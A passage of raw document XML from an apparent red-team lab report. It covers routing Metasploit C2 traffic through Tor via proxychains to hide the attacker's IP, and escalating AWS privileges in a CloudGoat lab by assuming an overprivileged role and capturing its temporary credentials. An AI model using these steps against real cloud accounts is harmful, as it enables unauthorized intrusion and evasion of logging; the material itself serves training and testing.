      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” and we can check the status of it by “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl status tor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”. Next:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the configuration file “nano /etc/proxychains4.conf”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uncomment “dynamic_chain” and comment out “strict_chain”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scroll to the very bottom to the [ProxyList] and ensure “socks4 127.0.0.1 9050” (or socks5).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save and exit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configured and activated the local Tor service to act as a proxy node. Modified the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration to utilize a dynamic chain routing through the local Tor SOCKS port (9050). Successfully launched Metasploit via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, effectively anonymizing outbound C2 traffic and obscuring the attacker's true IP address from network logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Privilege Abuse Simulation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s a cybersecurity technique that safely emulates real-world attacker methods to exploit over-permissioned identities, misconfigured IAM (Identity and Access Management) roles, and service trust policies in cloud environments (AWS, Azure, GCP).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pacu - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s an open-source AWS exploitation framework designed for offensive security testing against cloud environments, often described as “metasploit for aws”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">awscli - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s an open-source tool that enables you to interact with AWS services using commands in your command-line shell.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ScoutSuite - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A powerful open-source multi-cloud security auditing tool that helps you assess the security posture of your cloud environments (AWS, Azure, GCP, and more).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditing environment and Privilege abusing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you can abuse a privilege, you need to find the misconfiguration. ScoutSuite is an open-source multi-cloud security auditing tool that will scan your AWS environment and give you a clean HTML report of misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run scoutsuite “scout aws –profile cloudgoat”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the IAM section of the report and look for trust policy and strong permissions like “AdministratorAccess” or “iam*”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the role ARN of this vulnerable role.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we are using awscli to abuse privilege</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this comand with the ARN role “aws sts assume-role --role-arn "arn:aws:iam::123456789012:role/VulnerableAdminRole" --role-session-name "PrivEscalation" --profile cloudgoat”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture the credentials using AccessKeyID or SecretAccessKey or a SessionToken.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure Admin profile and finally we will verify the admin by “aws sts get-caller-identity”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="1077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94.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Misconfiguration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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AID002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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IAM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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Overprivileged 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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Misconfigured trust policy allowed low-privilege user to successfully execute sts:AssumeRole. Escalated to admin.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deployed ScoutSuite to audit the AWS environment, identifying an IAM role with excessive permissions and an overly permissive trust policy. Exploited this misconfiguration by executing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sts:AssumeRole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> API call via the AWS CLI. Successfully extracted temporary credentials, escalating our session access from a standard user to full Administrator privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated attack Orchestration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
